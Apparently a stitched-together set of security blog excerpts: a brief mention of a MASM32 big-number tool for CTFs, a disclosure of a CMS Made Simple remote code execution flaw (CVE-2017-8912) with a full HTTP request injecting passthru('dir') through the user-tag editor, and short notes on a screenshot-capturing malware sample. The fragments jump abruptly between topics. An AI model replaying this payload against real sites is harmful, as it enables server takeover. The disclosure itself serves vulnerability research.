With the recent CTF’s I’ve played, I thought of coding an app to calculate big numbers easily, instead of manually programming. At times playing with big numbers is painful. I have written this in MASM32 and have used biglib for big numbers.
One day I felt like reviewing the source code of some random CMS and I picked CMSMS. This is totally random and I did this to kill boredom.
Remote Code Execution – CVE-2017-8912
In admin/editusertag.php you can create custom user defined tags in which evil PHP functions are not blacklisted.
POST /cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://localhost/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4 Content-Length: 115 Cookie: cms_admin_user_id=1; cms_passhash=4df45e48ad5885afabe27e446666421b; _sk_=2a7da2216d41e0ac; CMSSESSIDacef9ab5f31b=mckpbvrmtj7n6ri53kiol718c5 Connection: close Pragma: no-cache Cache-Control: no-cache _sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1
I felt bored and thought of having a look at this exe. These are my rough notes on this one.
Every 5 seconds the function ‘401851’ is called.
Basically, this malware takes screenshots and encrypts them and stores them in the current directory starting with “temp%08x” % GetTickCount().